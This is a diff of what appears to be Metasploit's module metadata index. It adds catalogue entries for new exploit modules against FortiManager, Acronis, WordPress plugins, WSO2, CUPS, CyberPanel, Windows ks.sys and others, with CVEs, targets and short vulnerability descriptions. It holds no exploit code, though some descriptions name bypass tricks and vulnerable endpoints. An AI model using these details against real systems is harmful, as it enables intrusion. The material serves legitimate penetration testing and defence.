+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2024-12-02 18:16:43 +0000",
+    "path": "/modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb",
+    "is_install_path": true,
+    "ref_name": "linux/misc/fortimanager_rce_cve_2024_47575",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/misc/gld_postfix": {
    "name": "GLD (Greylisting Daemon) Postfix Buffer Overflow",
    "fullname": "exploit/linux/misc/gld_postfix",
@@ -94412,7 +95614,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 17:49:04 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/ceragon_fibeair_known_privkey",
@@ -94464,7 +95666,7 @@
    "targets": [
      "Cisco UCS Director < 6.7.2.0"
    ],
-    "mod_time": "2022-04-18 17:57:01 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/cisco_ucs_scpuser.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/cisco_ucs_scpuser",
@@ -94515,7 +95717,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 19:12:50 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/exagrid_known_privkey",
@@ -94567,7 +95769,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 19:25:38 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/f5_bigip_known_privkey",
@@ -94619,7 +95821,7 @@
    "targets": [
      "IBM Data Risk Manager <= 2.0.6.1"
    ],
-    "mod_time": "2022-04-18 19:34:49 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/ibm_drm_a3user.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/ibm_drm_a3user",
@@ -94668,7 +95870,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 19:43:16 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/loadbalancerorg_enterprise_known_privkey",
@@ -94770,7 +95972,7 @@
    "targets": [
      "Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40"
    ],
-    "mod_time": "2024-07-24 16:42:43 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/microfocus_obr_shrboadmin",
@@ -94819,7 +96021,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 20:14:57 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/quantum_dxi_known_privkey",
@@ -94868,7 +96070,7 @@
    "targets": [
      "Quantum vmPRO 3.1.2"
    ],
-    "mod_time": "2022-04-18 20:17:44 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/quantum_vmpro_backdoor",
@@ -94972,7 +96174,7 @@
    "targets": [
      "Symantec Messaging Gateway 9.5"
    ],
-    "mod_time": "2023-01-31 23:59:22 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/symantec_smg_ssh",
@@ -95022,7 +96224,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2023-01-31 23:59:22 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/vmware_vdp_known_privkey",
@@ -95099,7 +96301,7 @@
      "6.10_platform",
      "All"
    ],
-    "mod_time": "2023-10-23 06:54:38 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/vmware_vrni_known_privkey",
@@ -95601,6 +96803,69 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/acronis_cyber_protect_unauth_rce_cve_2022_3405": {
+    "name": "Acronis Cyber Protect/Backup remote code execution",
+    "fullname": "exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-08",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y <h00die.gr3y@gmail.com>",
+      "Sandro Tolksdorf of usd AG."
+    ],
+    "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n          compute, storage and application resources. Businesses and Service Providers are using it\n          to protect and backup all IT assets in their IT environment.\n          The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous\n          registration of new protect/backup agents on new endpoints. This API endpoint also\n          generates bearer tokens which the agent then uses to authenticate to the appliance.\n          As the management web console is running on the same port as the API for the agents, this\n          bearer token is also valid for any actions on the web console. This allows an attacker\n          with network access to the appliance to start the registration of a new agent, retrieve a\n          bearer token that provides admin access to the available functions in the web console.\n\n          The web console contains multiple possibilities to execute arbitrary commands on both the\n          agents (e.g., via PreCommands for a backup) and also the appliance (e.g., via a Validation\n          job on the agent of the appliance). These options can easily be set with the provided bearer\n          token, which leads to a complete compromise of all agents and the appliance itself.\n\n          You can either use the module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`\n          to collect target info for exploitation in this module. Or just run this module standalone and\n          it will try to exploit the first online endpoint matching your target and payload settings\n          configured at the module.\n\n          Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n          Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.",
+    "references": [
+      "CVE-2022-3405",
+      "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/",
+      "URL-https://attackerkb.com/topics/WVI3r5eNIc/cve-2022-3405"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 9877,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command",
+      "Windows Command"
+    ],
+    "mod_time": "2024-11-28 08:57:21 +0000",
+    "path": "/modules/exploits/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405.rb",
+    "is_install_path": true,
+    "ref_name": "multi/acronis_cyber_protect_unauth_rce_cve_2022_3405",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/browser/adobe_flash_hacking_team_uaf": {
    "name": "Adobe Flash Player ByteArray Use After Free",
    "fullname": "exploit/multi/browser/adobe_flash_hacking_team_uaf",
@@ -101524,6 +102789,68 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/clinic_pms_fileupload_rce": {
+    "name": "Clinic's Patient Management System 1.0 - Unauthenticated RCE",
+    "fullname": "exploit/multi/http/clinic_pms_fileupload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-31",
+    "type": "exploit",
+    "author": [
+      "Aaryan Golatkar",
+      "Oğulcan Hami Gül"
+    ],
+    "description": "This module exploits an unauthenticated file upload vulnerability in Clinic's\n          Patient Management System 1.0. An attacker can upload a PHP web shell and execute\n          it by leveraging directory listing enabled on the `/pms/user_images` directory.",
+    "references": [
+      "EDB-51779",
+      "CVE-2022-40471",
+      "URL-https://www.cve.org/CVERecord?id=CVE-2022-40471",
+      "URL-https://drive.google.com/file/d/1m-wTfOL5gY3huaSEM3YPSf98qIrkl-TW/view"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Clinic Patient Management System 1.0"
+    ],
+    "mod_time": "2024-12-17 21:39:30 +0000",
+    "path": "/modules/exploits/multi/http/clinic_pms_fileupload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/clinic_pms_fileupload_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/clipbucket_fileupload_exec": {
    "name": "ClipBucket beats_uploader Unauthenticated Arbitrary File Upload",
    "fullname": "exploit/multi/http/clipbucket_fileupload_exec",
@@ -110345,6 +111672,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/primefaces_weak_encryption_rce": {
+    "name": "Primefaces Remote Code Execution Exploit",
+    "fullname": "exploit/multi/http/primefaces_weak_encryption_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2016-02-15",
+    "type": "exploit",
+    "author": [
+      "Bjoern Schuette",
+      "h00die"
+    ],
+    "description": "This module exploits a Java Expression Language remote code execution flaw in the Primefaces JSF framework.\n          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack,\n          due to the use of weak crypto and default encryption password and salt.\n\n          Tested against Docker image with Tomcat 7.0 with the Primefaces 5.2 showcase application. See\n          documentation for working payloads.",
+    "references": [
+      "CVE-2017-1000486",
+      "URL-https://blog.mindedsecurity.com/2016/02/rce-in-oracle-netbeans-opensource.html",
+      "URL-https://web.archive.org/web/20180515174733/https://cryptosense.com/blog/weak-encryption-flaw-in-primefaces",
+      "URL-https://schuette.se/2018/01/17/cve-2017-1000486-in-your-primeface/",
+      "URL-https://github.com/primefaces/primefaces/issues/1152",
+      "URL-https://github.com/pimps/CVE-2017-1000486/tree/master",
+      "EDB-43733"
+    ],
+    "platform": "BSD,Linux,OSX,Unix,Windows",
+    "arch": "cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Universal"
+    ],
+    "mod_time": "2024-12-06 16:00:58 +0000",
+    "path": "/modules/exploits/multi/http/primefaces_weak_encryption_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/primefaces_weak_encryption_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/processmaker_exec": {
    "name": "ProcessMaker Open Source Authenticated PHP Code Execution",
    "fullname": "exploit/multi/http/processmaker_exec",
@@ -115108,20 +116500,25 @@
    "needs_cleanup": true
  },
  "exploit_multi/http/werkzeug_debug_rce": {
-    "name": "Werkzeug Debug Shell Command Execution",
+    "name": "Pallete Projects Werkzeug Debugger Remote Code Execution",
    "fullname": "exploit/multi/http/werkzeug_debug_rce",
    "aliases": [

    ],
-    "rank": 600,
+    "rank": 400,
    "disclosure_date": "2015-06-28",
    "type": "exploit",
    "author": [
-      "h00die <mike@shorebreaksecurity.com>"
+      "h00die <mike@shorebreaksecurity.com>",
+      "Graeme Robinson <metasploit <Graeme Robinson <metasploit@grobinson.me>/@GraSec>"
    ],
-    "description": "This module will exploit the Werkzeug debug console to put down a\n        Python shell. This debugger \"must never be used on production\n        machines\" but sometimes slips passed testing.\n\n        Tested against:\n          0.9.6 on Debian\n          0.9.6 on Centos\n          0.10  on Debian",
+    "description": "This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django. It may also be used alone.\n\n          The documentation states the following: \"The debugger must never be used on production machines. We cannot stress this enough. Do not enable the debugger in production.\" Of course this doesn't prevent developers from mistakenly enabling it in production!\n\n          Tested against the following Werkzeug versions:\n          - 3.0.3  on Debian 12, Windows 11 and macOS 14.6\n          - 1.1.4  on Debian 12\n          - 1.0.1  on Debian 12\n          - 0.11.5 on Debian 12\n          - 0.10   on Debian 12",
    "references": [
-      "URL-http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger"
+      "URL-https://werkzeug.palletsprojects.com/debug/#enabling-the-debugger",
+      "URL-https://flask.palletsprojects.com/debugging/#the-built-in-debugger",
+      "URL-https://web.archive.org/web/20150217044248/http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger",
+      "URL-https://web.archive.org/web/20151124061830/http://werkzeug.pocoo.org/docs/0.11/debug/#enabling-the-debugger",
+      "URL-https://github.com/pallets/werkzeug/commit/11ba286a1b907110a2d36f5c05740f239bc7deed?diff=unified&w=0#diff-83867b1c4c9b75c728654ed284dc98f7c8d4e8bd682fc31b977d122dd045178a"
    ],
    "platform": "Python",
    "arch": "python",
@@ -115142,9 +116539,12 @@
      "https"
    ],
    "targets": [
-      "werkzeug 0.10 and older"
+      "Werkzeug > 1.0.1 (Flask > 1.1.4)",
+      "Werkzeug 0.11.6 - 1.0.1 (Flask 1.0 - 1.1.4)",
+      "Werkzeug 0.11 - 0.11.5 (Flask < 1.0)",
+      "Werkzeug < 0.11 (Flask < 1.0)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2024-12-08 21:01:17 +0000",
    "path": "/modules/exploits/multi/http/werkzeug_debug_rce.rb",
    "is_install_path": true,
    "ref_name": "multi/http/werkzeug_debug_rce",
@@ -115152,6 +116552,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "account-lockouts"
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -116401,6 +117811,70 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_reallysimplessl_2fa_bypass_rce": {
+    "name": "WordPress Really Simple SSL Plugin Authentication Bypass to RCE",
+    "fullname": "exploit/multi/http/wp_reallysimplessl_2fa_bypass_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-11-14",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein",
+      "István Márton"
+    ],
+    "description": "This module exploits an authentication bypass vulnerability in the WordPress Really Simple SSL plugin\n          (versions 9.0.0 to 9.1.1.1). The vulnerability allows bypassing two-factor authentication (2FA) and\n          uploading a plugin to achieve remote code execution (RCE). Note: For the system to be vulnerable,\n          2FA must be enabled on the target site; otherwise, the exploit will not work.",
+    "references": [
+      "CVE-2024-10924",
+      "URL-https://github.com/RandomRobbieBF/CVE-2024-10924",
+      "URL-https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix In-Memory",
+      "Windows In-Memory"
+    ],
+    "mod_time": "2024-12-06 22:46:57 +0000",
+    "path": "/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_reallysimplessl_2fa_bypass_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/wp_responsive_thumbnail_slider_upload": {
    "name": "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
    "fullname": "exploit/multi/http/wp_responsive_thumbnail_slider_upload",
@@ -116575,6 +118049,136 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_multi/http/wp_time_capsule_file_upload_rce": {
+    "name": "WordPress WP Time Capsule Arbitrary File Upload to RCE",
+    "fullname": "exploit/multi/http/wp_time_capsule_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-11-15",
+    "type": "exploit",
+    "author": [
+      "Valentin Lobstein",
+      "Rein Daelman"
+    ],
+    "description": "This module exploits an arbitrary file upload vulnerability in the WordPress WP Time Capsule plugin\n          (versions <= 1.22.21). The vulnerability allows uploading a malicious PHP file to achieve remote\n          code execution (RCE).\n\n          The validation logic in the vulnerable function improperly checks for allowed extensions.\n          If no valid extension is found, the check can be bypassed by using a filename of specific length\n          (e.g., \"00.php\") matching the length of allowed extensions like \".crypt\".",
+    "references": [
+      "CVE-2024-8856",
+      "URL-https://hacked.be/posts/CVE-2024-8856",
+      "URL-https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-time-capsule/backup-and-staging-by-wp-time-capsule-12221-unauthenticated-arbitrary-file-upload"
+    ],
+    "platform": "Linux,PHP,Unix,Windows",
+    "arch": "php, cmd",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "PHP In-Memory",
+      "Unix/Linux Command Shell",
+      "Windows Command Shell"
+    ],
+    "mod_time": "2024-12-12 18:04:10 +0000",
+    "path": "/modules/exploits/multi/http/wp_time_capsule_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wp_time_capsule_file_upload_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_multi/http/wso2_api_manager_file_upload_rce": {
+    "name": "WSO2 API Manager Documentation File Upload Remote Code Execution",
+    "fullname": "exploit/multi/http/wso2_api_manager_file_upload_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-05-31",
+    "type": "exploit",
+    "author": [
+      "Siebene@ <@Siebene7>",
+      "Heyder Andrade <@HeyderAndrade>",
+      "Redway Security <redwaysecurity.com>"
+    ],
+    "description": "A vulnerability in the 'Add API Documentation' feature allows malicious users with specific permissions\n          (`/permission/admin/login` and `/permission/admin/manage/api/publish`) to upload arbitrary files to a user-controlled\n          server location. This flaw could be exploited to execute remote code, enabling an attacker to gain control over the server.",
+    "references": [
+      "URL-https://github.com/redwaysecurity/CVEs/tree/main/WSO2-2023-2988",
+      "URL-https://blog.redwaysecurity.com/2024/11/wso2-4.2.0-remote-code-execution.html",
+      "URL-https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2988/"
+    ],
+    "platform": "Linux,Windows",
+    "arch": "java",
+    "rport": 9443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic",
+      "WSO2 API Manager (3.1.0 - 4.0.0)",
+      "WSO2 API Manager (4.1.0)",
+      "WSO2 API Manager (4.2.0)"
+    ],
+    "mod_time": "2024-12-11 11:58:53 +0000",
+    "path": "/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/wso2_api_manager_file_upload_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/wso2_file_upload_rce": {
    "name": "WSO2 Arbitrary File Upload to RCE",
    "fullname": "exploit/multi/http/wso2_file_upload_rce",
@@ -117906,6 +119510,71 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/misc/cups_ipp_remote_code_execution": {
+    "name": "CUPS IPP Attributes LAN Remote Code Execution",
+    "fullname": "exploit/multi/misc/cups_ipp_remote_code_execution",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2024-09-26",
+    "type": "exploit",
+    "author": [
+      "Simone Margaritelli",
+      "Rick de Jager",
+      "David Batley",
+      "Spencer McIntyre",
+      "RageLtMan <rageltman@sempervictus>",
+      "Ryan Emmons"
+    ],
+    "description": "This module exploits vulnerabilities in OpenPrinting CUPS, which is running by\n          default on most Linux distributions. The vulnerabilities allow an attacker on\n          the LAN to advertise a malicious printer that triggers remote code execution\n          when a victim sends a print job to the malicious printer. Successful exploitation\n          requires user interaction, but no CUPS services need to be reachable via accessible\n          ports. Code execution occurs in the context of the lp user. Affected versions\n          are cups-browsed <= 2.0.1, libcupsfilters <= 2.1b1, libppd <= 2.1b1, and\n          cups-filters <= 2.0.1.",
+    "references": [
+      "CVE-2024-47076",
+      "CVE-2024-47175",
+      "CVE-2024-47177",
+      "CVE-2024-47176",
+      "URL-https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/",
+      "URL-https://github.com/RickdeJager/cupshax",
+      "URL-https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8",
+      "URL-https://github.com/OpenPrinting/libcupsfilters/security/advisories/GHSA-w63j-6g73-wmg5",
+      "URL-https://github.com/OpenPrinting/libppd/security/advisories/GHSA-7xfx-47qg-grp6",
+      "URL-https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-p9rh-jxmq-gq47",
+      "URL-https://github.com/h2g2bob/ipp-server/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2024-11-21 15:14:46 +0000",
+    "path": "/modules/exploits/multi/misc/cups_ipp_remote_code_execution.rb",
+    "is_install_path": true,
+    "ref_name": "multi/misc/cups_ipp_remote_code_execution",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/misc/erlang_cookie_rce": {
    "name": "Erlang Port Mapper Daemon Cookie RCE",
    "fullname": "exploit/multi/misc/erlang_cookie_rce",
@@ -125841,7 +127510,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/unix/http/schneider_electric_net55xx_encoder.rb",
    "is_install_path": true,
    "ref_name": "unix/http/schneider_electric_net55xx_encoder",
@@ -127327,7 +128996,7 @@
    "targets": [
      "vAPV 8.3.2.17 / vxAG 9.2.0.34"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb",
    "is_install_path": true,
    "ref_name": "unix/ssh/array_vxag_vapv_privkey_privesc",
@@ -127372,7 +129041,7 @@
    "targets": [
      "Unix-based Tectia SSH 6.3 or prior"
    ],
-    "mod_time": "2022-03-09 13:24:06 +0000",
+    "mod_time": "2024-11-18 17:32:48 +0000",
    "path": "/modules/exploits/unix/ssh/tectia_passwd_changereq.rb",
    "is_install_path": true,
    "ref_name": "unix/ssh/tectia_passwd_changereq",
@@ -128292,6 +129961,88 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/webapp/cyberpanel_preauth_rce_multi_cve": {
+    "name": "CyberPanel Multi CVE Pre-auth RCE",
+    "fullname": "exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-10-27",
+    "type": "exploit",
+    "author": [
+      "DreyAnd",
+      "Valentin Lobstein",
+      "Luka Petrovic (refr4g)"
+    ],
+    "description": "This module exploits three separate unauthenticated Remote Code Execution vulnerabilities in CyberPanel:\n\n          - CVE-2024-51567: Command injection vulnerability in the \"upgrademysqlstatus\" endpoint.\n          - CVE-2024-51568: Command Injection via the \"completePath\" parameter in the \"outputExecutioner\" sink.\n          - CVE-2024-51378: Unauthenticated RCE in \"/ftp/getresetstatus\" and \"/dns/getresetstatus\".\n\n          These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.",
+    "references": [
+      "CVE-2024-51567",
+      "CVE-2024-51568",
+      "CVE-2024-51378",
+      "URL-https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce",
+      "URL-https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/",
+      "URL-https://github.com/DreyAnd/CyberPanel-RCE",
+      "URL-https://github.com/refr4g/CVE-2024-51378",
+      "URL-https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/",
+      "URL-https://gist.github.com/gboddin/d78823245b518edd54bfc2301c5f8882"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix/Linux Command Shell"
+    ],
+    "mod_time": "2024-12-05 16:05:25 +0000",
+    "path": "/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/cyberpanel_preauth_rce_multi_cve",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null,
+    "actions": [
+      {
+        "name": "CVE-2024-51378",
+        "description": "Exploit using CVE-2024-51378"
+      },
+      {
+        "name": "CVE-2024-51567",
+        "description": "Exploit using CVE-2024-51567"
+      },
+      {
+        "name": "CVE-2024-51568",
+        "description": "Exploit using CVE-2024-51568"
+      }
+    ]
+  },
  "exploit_unix/webapp/datalife_preview_exec": {
    "name": "DataLife Engine preview.php PHP Code Injection",
    "fullname": "exploit/unix/webapp/datalife_preview_exec",
@@ -176290,7 +178041,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2024-12-12 17:11:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb",
    "is_install_path": true,
    "ref_name": "windows/local/cve_2020_0668_service_tracing",
@@ -177281,6 +179032,65 @@

    ]
  },
+  "exploit_windows/local/cve_2024_35250_ks_driver": {
+    "name": "Windows Access Mode Mismatch LPE in ks.sys",
+    "fullname": "exploit/windows/local/cve_2024_35250_ks_driver",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2024-06-11",
+    "type": "exploit",
+    "author": [
+      "AngelBoy",
+      "varwara",
+      "jheysel-r7"
+    ],
+    "description": "The ks.sys driver on Windows is one of the core components of Kernel Streaming and is installed by default.\n          There exists a LPE in this driver which can be exploited on many recent versions of Windows 10,\n          Windows 11, Windows Server 2022.",
+    "references": [
+      "URL-https://github.com/varwara/CVE-2024-35250",
+      "URL-https://devco.re/blog/2024/08/23/streaming-vulnerabilities-from-windows-kernel-proxying-to-kernel-part1-en/",
+      "URL-https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html",
+      "CVE-2024-35250"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
